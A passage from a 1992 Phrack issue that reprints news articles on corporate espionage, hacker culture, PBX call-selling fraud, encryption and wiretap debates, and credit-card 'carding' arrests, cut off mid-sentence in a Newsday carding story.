delivered private protests to Paris after it discovered DGSE agents trying to
infiltrate European branch offices of IBM and Texas Instruments to pass secrets
to a French competitor. The complaint fell on deaf ears. The French
intelligence budget was increased 9 percent this year, to enable the hiring of
1,000 new employees. A secret CIA report recently warned of French agents
roaming the United States looking for business secrets. Intelligence sources
say the French Embassy in Washington has helped French engineers spy on the
stealth technology used by American warplane manufacturers. "American
businessmen who stay in Paris hotels should still assume that the contents of
their briefcases will be photocopied," says security consultant Paul Joyal.
DGSE officials won't comment.

The French are hardly alone in business spying. NSA officials suspect
British intelligence of monitoring the overseas phone calls of American firms.
Investigators who just broke up a kidnap ring run by former Argentine
intelligence and police officials suspect the ring planted some 500 wiretaps on
foreign businesses in Buenos Aires and fed the information to local firms. The
Ackerman Group Inc., a Miami consulting firm that tracks espionage, recently
warned clients about Egyptian intelligence agents who break into the hotel
rooms of visiting execs with "distressing frequency."

How do the spies do it? Bugs and bribes are popular tools. During a
security review of a U.S. manufacturer in Hong Kong, consultant Richard
Hefferman discovered that someone had tampered with the firm's phone-switching
equipment in a closet. He suspects that agents posing as maintenance men
sneaked into the closet and reprogrammed the computer routing phone calls so
someone outside the building -- Heffernan never determined who -- could listen
in simply by punching access codes into his phone. Another example: After
being outbid at the last minute by a Japanese competitor, a Midwestern heavy
manufacturer hired Parvus Company, a Maryland security firm made up mostly of
former CIA and NSA operatives. Parvus investigators found that the Japanese
firm had recruited one of the manufacturer's midlevel managers with a drug
habit to pass along confidential bidding information.

Actually, many foreign intelligence operations are legal. "The science


and technology in this country is theirs for the taking so they don't even have
to steal it," says Michael Sekora of Technology Strategic Planning, Inc. Take
company newsletters, which are a good source of quota data. With such
information in hand, a top agent can piece together production rates.
American universities are wide open, too: Japanese engineers posing as students
feed back to their home offices information on school research projects.
"Watch a Japanese tour team coming through a plant or convention," says Robert
Burke with Monsanto Company. "They video everything and pick up every sheet of
paper."

Computer power: In the old days a business spy visited a bar near a plant
to find loose-lipped employees. Now all he needs is a computer, modem and
phone. There are some 10,000 computer bulletin boards in the United States --
informal electronic networks that hackers, engineers, scientists and
government bureaucrats set up with their PCs to share business gossip, the
latest research on aircraft engines, even private White House phone numbers.

An agent compiles a list of key words for the technology he wants, which
trigger responses from bulletin boards. Then, posing as a student wanting
information, he dials from his computer the bulletin boards in a city where
the business is located and "finds a Ph.D. who wants to show off," says Thomas
Sobczak of Application Configured Computers, Inc. Sobczak once discovered a
European agent using a fake name who posed questions about submarine engines to
a bulletin board near Groton, Connecticut. The same questions, asked under a
different hacker's name, appeared on bulletin boards in Charleston, South
Carolina, and Bremerton, Washington. Navy submarines are built or based at all
three cities.

Using information from phone intercepts, the NSA occasionally tips off
U.S. firms hit by foreign spying. In fact, Director Gates has promised he'll
do more to protect firms from agents abroad by warning them of hostile
penetrations. The FBI has expanded its economic counterintelligence program.
The State Department also has begun a pilot program with 50 Fortune 500
companies to allow their execs traveling abroad to carry the same portable
secure phones that U.S. officials use.

But U.S. agencies are still groping for a way to join the business spy
war. The FBI doesn't want companies to have top-of-the-line encryption devices
for fear the bureau won't be able to break their codes to tap phone calls in
criminal investigations. And the CIA is moving cautiously because many of the
foreign intelligence services "against whom you're going to need the most
protection tend to be its closest friends," says former CIA official George
Carver. Even American firms are leery of becoming too cozy with their
government's agents. But with more foreign spies coming in for the cash,
American companies must do more to protect their secrets.

How the Spies Do It

MONEY TALKS

Corporate predators haven't exactly been shy about greasing a few palms.
In some cases they glean information simply by bribing American employees. In
others, they lure workers on the pretense of hiring them for an important job,
only to spend the interview pumping them for information. If all else fails,
the spies simply hire the employees away to get at their secrets, and chalk it
all up to the cost of doing business.

STOP, LOOK, LISTEN


A wealth of intelligence is hidden in plain sight -- right inside public
records such as stockholder reports, newsletters, zoning applications and
regulatory filings. Eavesdropping helps, too. Agents can listen to execs'
airplane conversations from six seats away. Some sponsor conferences and
invite engineers to present papers. Japanese businessmen are famous for
vacuuming up handouts at conventions and snapping photos on plant tours.

BUGS

Electronic transmitters concealed inside ballpoint pens, pocket


calculators and even wall paneling can broadcast conversations in sensitive
meetings. Spies can have American firms' phone calls rerouted from the
switching stations to agents listening in. Sometimes, they tap cables attached
to fax machines.

HEARTBREAK HOTEL

Planning to leave your briefcase back at the hotel? The spooks will love
you. One of their ploys is to sneak into an room, copy documents and pilfer
computer disks. Left your password sitting around? Now they have entry to
your company's entire computer system.
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 10 of 13

PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN Phrack World News PWN
PWN PWN
PWN Issue XXXIX / Part One of Four PWN
PWN PWN
PWN Compiled by Datastream Cowboy PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

To Some Hackers, Right And Wrong Don't Compute May 11, 1992
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Bruce V. Bigelow (San Diego Union-Tribune)
Special Thanks to Ripper of HALE

The telephone call was anonymous, and the young, male voice was chatty and
nonchalant. He wanted to explain a few things about hacking, the black art of
tapping into private computers.

He was one of several hackers to call, both frightened and intrigued by a San
Diego police investigation into an informal network of computer criminals using
high-tech methods to make fraudulent credit-card purchases. Detectives have
seized a personal computer and other materials, and arrests are pending in San
Diego and other parts of the country.

"Half the time, it's feeding on people's stupidity," the anonymous hacker
said, boasting that most computers can be cracked as easily as popping a beer.
Hackers seem full of such bravado. In their electronic messages and in
interviews, they exaggerate and swagger.

One message traveling the clandestine network notes: "This text file contains
extremely damaging material about the American Express account making
algorithm. I do not commit credit card fraud. I just made up this scheme
because I was bored.

They form groups with names like "Legion of Doom" and "Masters of Deception,"
and give themselves nicknames like Phiber Optik, Video Vindicator and Outlaw.
They view themselves as members of a computer underground, rife with cat-and-
mouse intrigue.

For the most part, they are bring teenagers who are coming of age in a
computer-crazy world. Perhaps a generation ago, they tested their anti-
authoritarian moxie by shoplifting or stripping cars. But, as it has with
just about everything else, the computer has made teenage rebellion easier.

Nowadays, a teenager tapping on a keyboard in the comfort of his bedroom can


trespass on faraway corporate computers, explore credit files and surf coast-
to-coast on long-distance telephone lines.

San Diego police say that gathering details from computerized files as credit-
reporting agencies, hackers around the country have racked up millions of
dollars in fraudulent charges -- a trick known as "carding."

Conventual notions of right and wrong seem to go fuzzy in the ethereal realm
that hackers call cyberspace, and authorities say the number of crimes
committed by computer is exploding nationwide.

Like many hackers, the callers says he's paranoid. He won't give his name and
refuses to meed in person. Now a college student in San Diego, he says, he
began hacking when he was 13, collecting data by computer like a pack rat.

"I wanted to know how to make a bomb," he said with a laugh.

Like other hackers, he believes their strange underground community is


misunderstood and maligned. Small wonder.

They speak a specialized jargon of colons, slashes and equal signs. They work
compulsively -- sometimes obsessively -- to decipher and decode, the hacker
equivalent of breaking and entering. They exploit loopholes and flaws so they
can flaunt their techno-prowess.

"The basis of worth is what you know," the hacker says. "You'll hear the term
'lame' slung around a lot, especially if someone can't do too much."

They exchange credit-card numbers by electronic mail and on digital bulletin


boards set up on personal computers. They trade computer access codes,
passwords, hacking techniques and other information.

But it's not as if everyone is a criminal, the anonymous hacker says. What
most people don't realize, he say, is how much information is out there --
"and some people want things for free, you know?"

The real question for a hacker, he says, is what you do with the information
once you've got it. For some, restraint is a foreign concept.
RICH IN LORE

Barely 20 years old, the history of hacking already is rich in lore.

For example, John Draper gained notoriety by accessing AT&T long distance
telephone lines for free by blowing a toy whistle from a bod of Cap'n Crunch
cereal into the telephone.

Draper, who adopted "Captain Crunch" as his hacker nickname, improved on the
whistle with an electronic device that duplicated the flute like, rapid-fire
pulses of telephone tones.

Another living legend among hackers is a New York youth known as "Phiber
Optik."

"The guy has got a photographic memory,' said Craig Neidorf of Washington, who
co-founded an underground hacker magazine called Phrack. "He knows everything.
He can get into anything."

Phiber Optik demonstrated his skills during a conference organized by Harper's


Magazine, which invited some of the nation's best hackers to "log on" and
discuss hacking in an electronic forum. Harper's published a transcript of the
11-day discussion in it's March 1990 issue.

One of the participants, computer expert John Perry Barlow, insulted Phiber
Optik by saying some hackers are distinguished less by their intelligence than
by their alienation.

"Trade their modems for skateboards and only a slight conceptual shift would
occur," Barlow tapped out in his message.

Phiber Optik replied 13 minutes later by transmitting a copy of Barlow's


personal credit history, which Harper's editors noted apparently was obtained
by hacking into TRW's computer records.

For people like Emmanuel Goldstein, true hacking is like a high-tech game of
chess. The game is in the mind, but the moves are played out across a vast
electronic frontier.

"You're not going to stop hackers from trying to find out things," said
Goldstein, who publishes 2600 Magazine, the hacker quarterly, in Middle
Island, New York.

"We're going to be trying to read magnetic strips on cards," Goldstein said.


"We're going to try to figure out how password schemes work. That's not
going to change. What has to change is the security measures that companies
have to take."

ANGELHEADED HIPSTERS

True hackers see themselves, in the words of poet Allen Ginsberg, as


"Angelheaded hipsters burning for the ancient heavenly connection to the
starry dynamo in the machinery of night." These very words were used by Lee
Felsenstein, designer of the Osborne-1 computer and co-founder of the Homebrew
Computer Club.

But security consultants and law enforcement officials say malicious hackers
can visit havoc upon anyone with a credit card or driver's license.
"Almost none of it, I would say less than 10 percent, has anything to do with
intellectual exploration," said Gail Thackeray, a Phoenix prosecutor who has
specialized in computer crimes. "It has to do with defrauding people and
getting stuff you want without paying for it."

Such crimes have mushroomed as personal computers have become more affordable
and after the break up of AT&T made it more difficult to trace telephone calls,
Thackeray said.

Even those not motivated by financial gain show a ruthlessness to get what they
want, Thackeray said.

"They'll say the true hacker never damages the system he's messing with,"
Thackeray said, "but he's willing to risk it."

Science-fiction writer Bruce Sterling said he began getting anonymous calls


from hackers after an article he wrote about the "CyberView 91" hacker
convention was published in Details Magazine in October.

The caller's were apparently displeased with Sterling's article, which noted,
among other things, that the bustling convention stopped dead for the season's
final episode of "Star Trek: The Next Generation."

"They were giving me some lip," Sterling said. They showered him with
invective and chortled about details from Sterling's personal credit history,
which they had gleaned by computer.

They also gained access to Sterling's long distance telephone records, and
made abusive calls to many people who has spoken to Sterling.

"Most of the news stories I read simplify the problem to the point of saying
that a hacker is a hacker is a hacker," said Donn Parker, a computer security
consultant with SRI International in Menlo Park.

"In real life, what we're dealing with is a very broad spectrum of
individuals," Parker says. "It goes all the way from 14-year olds playing
pranks on their friends to hardened juvenile delinquents, career criminals and
international terrorists."

Yet true hackers have their own code of honor, Goldstein says. Computer
trespassing is OK, for example, but altering or damaging the system is wrong.

Posing as a technician to flim-flam access codes and passwords out of


unsuspecting computers users is also OK. That's called "social engineering."

"They're simply exploring with what they've got, weather it's exploring a
haunted house or tapping into a mainframe," Goldstein said.

"Once we figure things out, we share the information, and of course there are
going to be those people that abuse that information," Goldstein added.

It is extremely easy to break into credit bureau computers, Goldstein says.


But the privacy being violated belongs to individual Americans -- not credit
bureaus.

If anything, credit bureaus should be held accountable for not providing


better computer security, Goldstein argues.
_______________________________________________________________________________

Companies Fall Victim To Massive PBX Fraud April 20, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Barbara E. McMullen & John F. McMullen (Newsbytes)

NEW YORK CITY -- Appearing on the WBAI radio show "Off The Hook," New York
State Police senior investigator Donald Delaney discussed the movement of
organized crime groups into telecommunications fraud and warned the public
of the dangers of such practices as "shoulder surfing."

Delaney said that corporations are being victimized to the tune of millions of
dollars by unauthorized persons "outdialing" through their private branch
exchanges (PBXs). He traced the case of Data Products, a computer peripheral
firm, that did not even seem aware that calls could be routed from the outside
through their switchboard to foreign countries. It was only, according to
Delaney, when it received a monthly telephone bill of over $35,000 that it
perceived a problem.

"It was at 5:10 PM on a certain date that Liriano finally, after weeks of
trying, was able to obtain an outside dial tone on Data Products 800 number.
Subsequent investigation showed that thousands of calls using a 9600 baud modem
as well as manually placed calls had been made to the 800 number. At 7:30 the
same evening, a call using the Data Products number was placed to the Dominican
Republic from a telephone booth near Liriano's house. Within a few hours,
calls were placed from phones all around the neighborhood -- and, within a
week, calls began being placed from booths all around Manhattan," Delaney
related.

Phiber Optik, another studio guest and a convicted computer intruder previously
arrested by Delaney, commented, "I'm glad that Mr. Delaney didn't refer to
these people as hackers, but identified them for what they are: Sleezy common
criminals. What these people are doing requires no super computer knowledge
nor desire to learn. They are simply using computers and telephones to steal."

Delaney agreed, saying, "The people actually selling the calls, on the street
corner, in their apartments, or, in the case of cellular phones, in parked
cars, don't have to know anything about the technology. They are given the
necessary PBX numbers and codes by people higher up in the group and they just
dial the numbers and collect the money. In the case of the re-chipped or clone
cellular phones, they don't even have to dial the numbers."

Delaney added, "These operations have become very organized very rapidly. I
have arrested people that have printed revenue goals for the current month,
next six months, and entire year -- just like any other franchise operation.
I'm also currently investigating a murder of a call-seller that I arrested last
October. He was an independent trying to operate in a highly organized and
controlled section of Queens. His pursuit of an independent career may well
have been responsible for his death."

Off The Hook host Emmanuel Goldstein asked Delaney what responsibility that the
PBX companies bear for what seems to be rather easy use of their systems for
such activity. Delaney responded that he thought that the companies bear at
least an ethical and moral responsibility to their clients to insure that they
are aware of their exposure and the means that they must take to reduce the
exposure. "As far as criminal and civil responsibility for the security of the
system, there are no criminal statues that I am aware of that would hold the
PBX companies criminally liable for failure to insure proper security. On the
civil side, I think that the decision in the AT&T suit about this very topic
will shed some light of legal responsibility."

Goldstein also brought up the difficulties that some independent "customer-


owned coin-operated" telephones (COCOTs) cause for customers. "The charges are
often exorbitant, access to AT&T via 10288 is sometimes blocked, there is not
even the proper access to 911 on some systems, and some either block 800 calls
or actually try to charge for the connection to the 800 numbers.

"We've even found COCOTs that, on collect calls, put the charges through when
an answering machine picks up and the caller hangs up after realizing that no
one is home. They are set up to start billing if a human voice is heard and the
caller doesn't hang up within 5 or 10 seconds."

Delaney agreed that the COCOTS that behave in this fashion are an ongoing
problem for unsuspecting users, but said that he has received no complaints
about illegal behavior. He said, however, that he had received complaints
about fraudulent operation of 540 numbers -- the local New York equivalent of a
900 number. He said "most people don't realize that a 540 number is a
chargeable number and these people fall victim to these scams. We had one case
in which a person had his computer calling 8,000 phone numbers in the beeper
blocks each night. The computer would send a 540 number to the beepers.
People calling the number would receive some innocuous information and, at the
end of the month a $55 charge on her/his telephone bill."

Delaney continued, "The public has much to be worried about related to


telephone fraud, particularly in New York City which can be called "Fraud
Central, USA." If you go into the Port Authority Bus Terminal and look up in
the balcony, you will see rows of people "shoulder surfing" with binoculars.
They have binoculars or telescopes trained on the public telephones. When they
see a person making a credit card call, they repeat the numbers into a tape
recorder. The number is then sold and, within a few days, it is in use all
around the city. People should always be aware of the possibility of shoulder
surfers in the area."

Goldstein returned to the 540 subject, pointing out that "because so many
people don't realize that it is a billable number, they get caught by ads and
wind up paying for scam calls. We published a picture in 2600 Magazine of a
poster seen around New York, advertising apartment rental help by calling a
540 number. In very tiny print, almost unreadable, it mentions a charge.
People have to be very careful about things like this."

Delaney agreed, saying, "The 540 service must say within the first 10 seconds
that there is a charge, how much it is, and that the person can hang up now
without being charged -- the guy with the beeper scam didn't do that and that
was one of the reasons for his arrest. Many of the services give the charge so
fast and mix it in with instructions to stay on for a free camera or another
number to find out about the vacation that they have won that they miss the
charges and wind up paying. The 540 person has, although he may be trying to
defraud, complied with the letter of the law and it might be difficult to
prosecute him. The average citizen must therefore be more aware of these scams
and protect themselves."

Goldstein, Phiber Optik, and Delaney spent the remainder of the show answering
listener questions. Off The Hook is heard every Wednesday evening on New York
City's WBAI (99.5 FM). Recent guests have included Mike Godwin, in-house
counsel of the Electronic Frontier Foundation; and Steve Jackson, CEO of Steve
Jackson Games.
_______________________________________________________________________________

Changing Aspects Of Computer Crime Discussed At NYACC May 15, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Barbara E. McMullen (Newbytes)

New York City -- Donald Delaney, New York State Police senior investigator, and
Mike Godwin, in-house counsel, Electronic Frontier Foundation (EFF), speaking
to the May meeting of the New York Amateur Computer Club (NYACC), agreed that
the entrance of organized crime into telecommunications fraud has made the
subject of computer crime far different than that discussed just a year ago at
a similar meeting.

Newsbytes New York bureau chief John McMullen, moderating the discussion,
recalled that Delaney in last year's appearance had called for greater
education of law enforcement officers in technological areas, the establishment
of a New York State computer crime lab, outreach by law enforcement agencies to
the public to heighten awareness of computer crime and the penalties attached
-- items that have all come to pass in the ensuing 12 months. He also
mentioned that issues involving PBX & cellular phone fraud, privacy concerns
and ongoing debate over law enforcement wiretapping & decryption capabilities
have replaced the issues that received most of the attention at last year's
meeting.

Delaney agreed with McMullen, saying that there has been major strides made in
the education of law enforcement personnel and in the acquisition of important
tools to fight computer crime. He said that the practice of "carding" -- the
purchasing of goods, particularly computer equipment, has become a much more
major problem than it was a year ago and that many more complaints of such
activities are now received.

He added that "call-selling" operations, the making of international telephone


calls to foreign countries for a fee, through the fraudulent use of either a
company's private branch exchange (PBX) or an innocent party's cellular phone
account, has become so lucrative that arrested suspects have told him that
"they are moving from drug sales to this type of crime because it is less
dangerous and more rewarding."

Delaney pointed out, however, that one of his 1991 arrests had recently been
murdered, perhaps for trying to operate as an independent in an area that now
seems to be under the control of a Columbian mob "so maybe it's not going to
continue to be less dangerous."

Delaney also said that PBX fraud will continue to be a problem until the
companies using PBX systems fully understand the system capabilities and take
all possible steps to insure security. "Many firms don't even know that their
systems have out-dialing capabilities until they get it with additional monthly
phone charges of upwards of $35,000. They don't realize that the system has
default passwords that are supposed to be changed," he said, "It finally hits
some small businesses when they are bankrupted by the fraudulent long-distance
charges."

Godwin, in his remarks, expressed concern that there is not sufficient


recognition of the uniqueness of BBS and conferencing systems and that,
therefore, legislators possibly will make decisions based on misunderstandings.
He said "Telephone conversations, with the exception of crude conference call
systems are 'one-to-one' communications. Newspapers and radio & telephone are
"one-to-many" systems but BBS" are "many-to-many" and this is different. EFF
is interested in seeing that First Amendment protection is understood as
applying to BBSs."

He continued "We also have a concern that law enforcement agencies will respond
to the challenges of new technology in inappropriate ways. The FBI and Justice
Department, through the 'Digital Telephony Initiative' have requested that the
phone companies such at AT&T and Sprint be required to provide law enforcement
with the a method of wire-tapping in spite of technological developments that
make present methods less effective.

"Such a procedure would, in effect, make the companies part of the surveillance
system and we don't think that that is their job. We think that it is up to
law enforcement to develop their own crime-fighting tools. When the telephone
was first developed it made it more difficult to catch crooks. They no longer
had to stand around together to plan foul deeds; they could do it by telephone.
Then the government discovered wiretapping and was able to respond.

"This ingenuity was shown again recently when law enforcement officials,
realizing that John Gotti knew that his phones were tapped and discussed
wrongdoings outdoors in front of his house, arranged to have the lampposts
under which Gotti stood tapped. That, in my judgement, is a reasonable
approach by law enforcement."

Godwin also spoke briefly concerning the on-going debate over encryption. "The
government, through varies agencies such as NSA, keeps attempting to restrict
citizens from cloaking their computer files or messages in seemingly
unbreakable coding. We think that people have rights to privacy and, should
they wish to protect it by encoding computer messages, have a perfect right to
do so."

Bruce Fancher, sysop and owner of the new New York commercial BBS service,
MindVox, and the last speaker in the program, recounted some of his experiences
as a "hacker" and asked the audience to understand that these individuals, even
if found attached to a computer system to which they should not legitimately
access, are not malicious terrorists but rather explorers. Fancher was a last
minute replaced for well-known NY hacker Phiber Optik who did not speak, on the
advice of his attorney, because he is presently the subject of a Justice
Department investigation.

During the question and answer period, Delaney suggested that a method of
resolving the encryption debate would be for third parties, such as banks and
insurance companies, to maintain the personal encryption key for those using
encryption. A law enforcement official would then have to obtain a judge's
ruling to examine or "tap" the key for future use to decipher the contents of
the file or message.

Godwin disagreed, saying that the third party would then become a symbol for
"crackers" and that he did not think it in the country's best interests to just
add another level of complexity to the problem.

The question and answer period lasted for about 45 minutes with the majority of
questions concerning encryption and the FBI wiretap proposal.
_______________________________________________________________________________

Couple Of Bumbling Kids April 24, 1992


~~~~~~~~~~~~~~~~~~~~~~~
By Alfred Lubrano (Newsday)
Two young Queens computer hackers, arrested for the electronic equivalent of
pickpocketing credit cards and going on a computer shopping spree, will be
facing relatively minor charges.

Rudolph Loil, age 17, of Woodside, charged with attempted grand larceny, was
released from police custody on a desk appearance ticket, a spokesman for the
Queens district attorney's office said.

A 15-year-old friend from Elmhurst who was also arrested was referred to Queens
Family Court, whose proceedings are closed, the spokesman said. He was not
identified because of his age.

Law-enforcement sources said they are investigating whether the two were
"gofers" for adults who may have engaged them in computer crime, or whether
they acted on their own.

But Secret Service officials, called into the matter, characterized the case as
"just a couple of bumbling kids" playing with their computer.

The youths were caught after allegedly ordering $1,043 in computer equipment
with a credit card number they had filched electronically from bank records,
officials said.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Hackers April 27, 1992


~~~~~~~
Taken from InformationWeek (Page 8)

Two teenagers were arrested last week in New York for using computers to steal
credit card and telephone account numbers and then charging thousands of
dollars worth of goods and phone calls to the burgled accounts.

The two were caught only after some equipment they had ordered was sent to the
home of the credit card holder whose account number had been pilfered. Their
arrests closely follow the discovery by the FBI of a nationwide ring of 1,000
computer criminals, who charge purchases and telephone calls to credit card and
phone account numbers stolen from the Equifax credit bureau and other sources.

The discovery has already led to the arrest of two Ohio hackers and the seizure
of computer equipment in three cities.
_______________________________________________________________________________

DOD Gets Fax Evesdroppers April 14, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~
By Joseph Albright (Atlanta Journal and Constitution)(Page A12)

Washington -- The Air Force is buying a new weapon to battle leaks: A $30,000
portable fax-tapper.

Whenever someone transmits a fax, the fax-tapping device attached to the phone
line will sneak an electronic copy and store it in a laptop computer's memory.
Each of the new devices will enable an Air Force intelligence officer to
monitor four telephones for "communications security" violations.

Susan Hansen, a Defense Department spokeswoman, said last week that "there is
no plan right at the moment" to install the devices in the Pentagon, whose
top leaders have been outraged in recent weeks by leaks of classified policy
documents to reporters.

But she left open the possibility that some of them will be attached to
sensitive military fax lines when the tapping devices are delivered to the Air
Force six months to a year from now.

"There are a lot of things that are under review here," she said after
consulting with the Pentagon's telecommunications office.

Plans to buy 40 of the devices were disclosed a few weeks ago in a contract
notice from a procurement officer at Wright-Patterson Air Force Base near
Dayton, Ohio. When contacted, a spokesman referred inquiries to the Air
Force Intelligence Command at Kelly Air Force Base, Texas, which authorized the
purchase.

The Air Force Intelligence Command insisted that the devices will never be used
for law enforcement purposes or even "investigations."

"The equipment is to be used for monitoring purposes only, to evaluate the


security of Air Force official telecommunications," said spokesman Dominick
Cardonita. "The Air Force intelligence command does not investigate."

Mr. Cardonita said that, for decades, Air Force personnel in sensitive
installations have been on notice that their voice traffic on official lines is
subject to "communications security" monitoring. The fax-tapper simply
"enhances" the Air Force's ability to prevent "operational security"
violations, he said.

He estimated that the Air Force will pay $1.2 million under the contract, due
to be let this June. That averages out to $ 30,000 for each fax-tapper, but
Mr. Cardonita said the price includes maintenance and training.

Douglas Lang, president of Washington's High Technology Store and an authority


on security devices, said that, so far as he knows, the Air Force is the first
government agency to issue an order for fax-tapping machines.

Mr. Lang said he has heard from industry sources that 15 contractors have
offered to sell such devices to Wright-Patterson.

"It is one more invasion of privacy by Big Brother," declared Mr. Lang, who
predicted that the Air Force will use the devices mainly to catch anyone trying
to leak commercially valuable information to contractors.

Judging from the specifications, the Air Force wants a machine that can trace
leaks wherever they might occur.

Mr. Cardonita said the Air Force Intelligence Command will use the devices
only when invited onto an Air Force base by a top commander.
_______________________________________________________________________________

900-Number Fraud Case Expected to Set a Trend April 2, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By David Thompson (Omaha <Nebraska> World-Herald)

Civil court cases against abuses of 900-toll telephone number "will be slam
dunks" as the result of the successful prosecution of a criminal case in Omaha
over 900 numbers, a federal postal inspector said.
Postal inspector Michael Jones said numerous civil actions involving 900
numbers have been filed, including three recently in Iowa. At least one civil
case is pending in Nebraska, he said, and there may be others.

Jones said the mail fraud conviction of Bedford Direct Mail Service Inc. of
Omaha and its president, Ellis B. Goodman, 52, of 1111 South 113th. Court, may
have been the first criminal conviction involving 900 numbers.

The conviction also figures in Nebraska Attorney General Don Stenberg's


consumer protection program, which calls attention to abuses of 900 numbers, a
staff member said.

Among consumer complaints set to Stenberg's office, those about 900 numbers
rank in the top five categories, said Daniel L. Parsons, senior consumer
protection specialist.

People are often lured by an offer of a gift or prize to dial a toll-free 800
number, then steered to a series of 900 numbers and charged for each one,
Parsons said.

He said that during the last two years, state attorneys general have taken
action against 150 organizations for allegedly abusing 900 numbers.
_______________________________________________________________________________

==Phrack Inc.==

Volume Four, Issue Thirty-Nine, File 11 of 13

PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
PWN PWN
PWN Phrack World News PWN
PWN PWN
PWN Issue XXXIX / Part Two of Four PWN
PWN PWN
PWN Compiled by Datastream Cowboy PWN
PWN PWN
PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

The Charge Of The Carders May 26, 1992


~~~~~~~~~~~~~~~~~~~~~~~~~
By Joshua Quittner (<New York> Newsday)(Page 45)

Computer criminals are after your credit-card numbers --


to steal with, sell and swap.

THE KID, from Springfield Gardens, Queens, was a carder, of course.

He was doing what carders do: trying to talk a salesman into overnight-
expressing him a $4,000 computer system -- and using a stolen credit-card
number for payment.

The salesman was playing right along on the phone; he had also notified a co-
worker to alert the New York State Police, said William Murphy, a customer
service manager at Creative Computers, who described the event as it was
unfolding on a recent Tuesday morning. Murphy said that on a typical day, as
many as a dozen times, carders would call and try to buy everything from modems
to whole computer systems.

Murphy said that these days, the security people at Creative Computers are able
to stop virtually all of them, either by not delivering the goods, or by
delivering them UPS -- that's United Police Service.

He sighed: "It's amazing that they even try."

But try they do. And at other places, they're successful. Where once hacking
into a credit bureau was a kind of rite of passage for computer intruders, who
generally did little more than look up credit histories on people like Mike
Dukakis, now computer criminals are mining national credit bureaus and mail-
order houses, coming away with credit-card numbers to sell, swap or use for
mail-order purchases.

Underground electronic bulletin board systems help spread not only the
passwords, but the techniques used to tap into different systems. In
San Diego on April 30, for instance, police raided a bulletin board called
Scantronics, which offered among other things, step-by-step manuals on how to
hack into Equifax Credit Information Services and TRW Information Services, the
largest credit bureaus in the nation, the San Diego Tribune reported.

"The potential for fraud is enormous, it's almost limitless," said Joel Lisker,
Mastercard International's vice president of security and risk management, who
noted that computer intruders accessed "thousands" of credit-card account
numbers in another recent case.

MASTERCARD is putting together a task force of its bank members to address the
problem, and is considering inviting hackers in to learn what they can do to
tighten up computer access to credit bureaus, he said.

Mastercard estimates it lost $57 million to counterfeit scams last year; Lisker
said it is impossible to say how much carders contributed. But based on the
volume of arrests lately, he figures carding has become a big problem.

"It's kind of like a farmer that sees a rat," Lisker said. "If he sees one, he
knows he has several. And if he sees several he knows he has a major
infestation. This is a major infestation."

"It's clearly something we should be concerned about," agreed Scott Charney,


chief of the U.S. Justice Department's new Computer Crime Unit. Charney said
that roughly 20 percent of the unit's current caseload involves credit-card
fraud, a number that, if nothing else, colors the notion that all hackers are
misunderstood kids, innocently exploring the world of computer networks.

"Whether such noble hackers exist, the fact of the matter is we're seeing
people out there whose motives are not that pure," he said.

On May 11, New York State Police arrested three teenagers in Springfield
Gardens when one of them went to pick up what he hoped was an Amiga 3000
computer system from Creative Computers, at a local UPS depot.

"What he wanted was a computer, monitor and modem. What he got was arrested,"
said John Kearey, a state police investigator who frequently handles computer
and telecommunications crimes. Police posed as UPS personnel and arrested the
youth, who led them to his accomplices.

Kearey said the teens said they got the stolen credit-card number from a
"hacker who they met on a bridge, they couldn't remember his name" -- an
interesting coincidence because the account number was for a next-door neighbor
of one of the youths. Police suspect that the teens, who claimed to belong to
a small hacking group called the MOB (for Men of Business) either hacked into a
credit bureau for the number, got someone else to do it, or went the low-tech
route -- "dumpster diving" for used carbon copies of credit receipts.

Indeed, most credit-card fraud has nothing to do with computer abusers.


Boiler-room operations, in which fast-talking con men get cardholders to
divulge their account numbers and expiration dates in exchange for the promise
of greatly discounted vacations or other too-good-to-be-true deals, are far and
away the most common scams, said Gregory Holmes, a spokesman for Visa.

But carders have an advantage over traditional credit-card cheats: By using


their PCs to invade credit bureaus, they can find credit-card numbers for
virtually anyone. This is useful to carders who pick specific credit-card
numbers based on location -- a neighbor is out of town for a week, which means
all you have to do is get his account number, stake out his porch and sign for
the package when the mail comes. Another advantage is address and ZIP code
verifications, once a routine way of double-checking a card's validity, are no
longer useful because carders can get that information from an account record.

"It's tough," Holmes said. "Where it becomes a major problem is following the
activity of actually getting the credit-card number; it's sent out on the black
market to a vast group of people" generally over bulletin boards. From there,
a large number of purchases can be racked up in a short period of time, well
before the cardholder is aware of the situation. While the cardholder is not
liable, the victims usually are businesses like Creative Computers, or the
credit-card company.

Murphy said his company used to get burned, although he would not divulge the
extent of its losses. "It happened until we got wise enough to their ways," he
said.

Now, with arrangements among various law enforcement agencies, telephone


companies and mail carriers, as well as a combination of call-tracing routines
and other verification methods, carders "rarely" succeed, he said. Also, a
dozen employees work on credit-card verification now, he said. "I feel sorry
for the companies that don't have the resources to devote departments to filter
these out. They're the ones that are getting hit hard."

In New York, federal, state and local police have been actively investigating
carder cases. Computers were seized and search warrants served on a number of
locations in December, as part of an ongoing federal investigation into
carding. City police arrested two youths in Queens in April after attempting
to card a $1,500 computer system from Creative Computers. They were arrested
when they tried to accept delivery.

"It's a legitimate way to make money. I know people who say they do it,"
claimed a 16-year-old Long Island hacker who uses the name JJ Flash.

While he says he eschews carding in favor of more traditional, non-malicious


hacking, JJ Flash said using a computer to break into a credit bureau is as
easy as following a recipe. He gave a keystroke-by-keystroke description of
how it's done, a fairly simple routine that involved disguising the carder's
calling location by looping through a series of packet networks and a Canadian
bank's data network, before accessing the credit bureau computer. Once
connected to the credit bureau computer, JJ Flash said a password was needed --
no problem, if you know what underground bulletin boards to check.

"It's really easy to do. I learned to do it in about thirty seconds. If you


